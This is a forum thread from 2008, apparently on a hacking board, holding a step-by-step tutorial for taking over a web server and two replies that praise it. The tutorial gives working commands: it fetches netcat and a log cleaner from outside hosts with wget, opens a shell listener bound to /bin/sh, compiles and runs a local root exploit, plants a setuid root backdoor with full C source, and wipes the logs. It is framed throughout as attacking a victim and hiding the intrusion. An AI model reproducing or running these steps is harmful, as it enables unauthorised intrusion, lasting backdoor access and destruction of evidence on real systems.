paxnWo Posted November 23, 2008 Report Posted November 23, 2008 Required for this tutorial:Access to a shell - Upload by any-means a shell onto a box mig-log cleaner - [URL]http://b14ck1c3.freehostia.com/miglc[/URL] Netcat - [URL]http://www.vulnwatch.org/netcat/nc111nt.zip[/URL] Netcat(unix) - [URL]http://b14ck1c3.freehostia.com/nc[/URL] Local Root Exploit - [URL]http://jshooter.by.ru/xpl/[/URL]half a brainwillingness to learnNow that you have all that in order lets begin.Go to the path of or access your shell by whatever means nessecary.Make sure that your shell is in a writable folder just to make thingseasy for us. In our case today for this tutorial we will be usingstorm7shell not exactly my favorite but will get the job done none the less.An example of this location would be something like:[URL]http://target/youshell.php[/URL]Now that we are on your shells page we want to find out what os this box isrunning and what version the kernel is. In our case it's linux 2.6.8. So wewill want to find a local root exploit for this kernel version of the linux os.What we want to do now that we have our local root exploit for our kernelis spawn a shell so that we can talk to the victim's box and run our commandswithout interuption, But how are we suppose to do that? This can be done byusing a tool called Netcat. So now that we have a copy of Netcat we will go tothe shell, Find the command execution area of the shell and enter:wget [URL]http://b14ck1c3.freehostia.com/nc[/URL]What this will do is download the file of Netcat i have pre-compiled and hostedfor you onto the victim box to the location of your shell. Once we have the downloadcomplete we will want to chmod it so that our user has access to run it. which canbe done by entering:chmod +x ncWhat this does is grants everyone (user, group and other) execute permission, and thecommand to the file nc which we had just previously downloaded onto the box with thewget command.Now that we have nc installed on both the victim machine and your own it's time to makeour connection. How Do we make a connection with nc? In the command execution area of yourshell enter:./nc -l -p 8080 -e /bin/sh (shell can be /bin/sh or cmd.exe for example)And then on the netcat installed on your pc you will want to enter:nc VictimIP Port *in our case 8080* eg 123.123.123.123 8080What this will do is cause the netcat on the victims box to listen on port 8080 and shovelback an interactive shell for you once you make the connection from which you typed:nc victimip portNow that We have our interactive shell spawned we can start to prepare the box for rooting.First we will want to get our local root exploit onto the box and get it compiled if it'snot already. This can be done by once again using that nifty wget command we learned aboutin the previous steps.wget [URL]http://yoursite/xpl[/URL]What we have done is now downloaded your exploit. If your exploit is not already compiled youwill need to compile it in order to run it. Compiling your exploit can be done by using the gcc,like so:gcc xpl.c -o xpl;chmod +x xplThis will compile your xpl.c and output it into a file called xpl wich will be the compiled copyof your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on.The exploit will vary on their usage so make sure you have an understanding of the root exploityou are using. You can run your xpl file by entering in:./xplWait until your exploit is finished running once it is done enter:whoamiWhat the whoami command does is tells you who you are if this tells you root then you xpl has doneit's job and you now have root priv's on the box. or you can type:idwhich will give you something like:uid=0(root) gid=0(root) groups=500(apache) or something similarAnd now you can do your happy dance.Now that we have rooted the box and finished humiliating ourselves by dancing around we want to makesure that we can come and go as we please without all the hassel of rooting the box over and over. Sowe will want to create some kind of backdoor.we can make this happen with few lines of code:#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main( void ) { setuid( 0 ); system( "/bin/bash" ); return 0; }Compile it and change permissions:root@foobar /root# gcc -o .bkdr main.c root@foobar /root# chown root:root .bkdr root@foobar /root# chmod +s .bkdrNow, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrablyin the $PATH) and if you execute it as another user:raif@foobar /home/raif$ /usr/local/bin/.bkdr root@foobar /home/raif# whoamirootNow you have your access back.Alright we are almost completed our mission we have successfully rooted our victims box created ourbackdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. Thiscan be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which youcan get here:[URL]http://b14ck1c3.freehostia.com/miglc[/URL]Once again we can use our wget command to upload our logcleaner to the rooted box.wget [URL]http://b14ck1c3.freehostia.com/miglc;chmod[/URL] +x miglcnow just run the logcleaner./miglcThe mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleanerso you may choose how exactly you want to clean the logs with the commands given to you.Credits : w3tw0rk Quote
MrRip Posted November 23, 2008 Report Posted November 23, 2008 Good job paxnWo . You bring us very interesting tutorials . Congrats Quote
noes Posted August 23, 2009 Report Posted August 23, 2009 Thanks,very good tutorial. Covering all steps needed...Can you please update the local exploits links?...I can not get one for solaris 5.9Merci. Quote